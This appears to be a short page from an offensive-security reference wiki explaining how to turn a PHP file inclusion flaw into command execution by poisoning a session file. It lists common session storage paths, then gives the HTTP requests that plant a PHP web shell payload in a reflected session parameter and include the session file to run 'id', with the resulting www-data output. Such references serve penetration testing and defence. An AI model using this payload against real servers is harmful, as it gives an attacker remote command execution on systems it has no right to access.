PHP session

When a web server wants to handle sessions, it can use PHP session cookies (PHPSESSID).

Finding where the sessions are stored.
Examples:
- Linux : /var/lib/php5/sess_[PHPSESSID]
- Linux : /var/lib/php/sessions/sess_[PHPSESSID]
- Windows : C:\Windows\Temp\
Displaying a PHPSESSID to see if any parameter is reflected inside.
Example:
- The user name for the session (from a parameter called user)
- The language used by the user (from a parameter called lang)
Exemple :

GET /?user=/var/lib/php/sessions/sess_[PHPSESSID] HTTP/2

username|s:6:"tester";lang|s:7:"English";

3. Inject some PHP code in the reflected parameter in the session

GET /?user=<%3fphp+system($_GET['cmd'])%3b+%3f> HTTP/2

4. Call the session filewith the vulnerable parameter to trigger a command exection

GET /?user=/var/lib/php/sessions/sess_[PHPSESSID]&cmd=id HTTP/2

</h2> username|s:30:"uid=33(www-data) gid=33(www-data) groups=33(www-data)
";lang|s:7:"English";

PreviousPHP wrappers and streams Next/proc

Last updated 2 years ago

Was this helpful?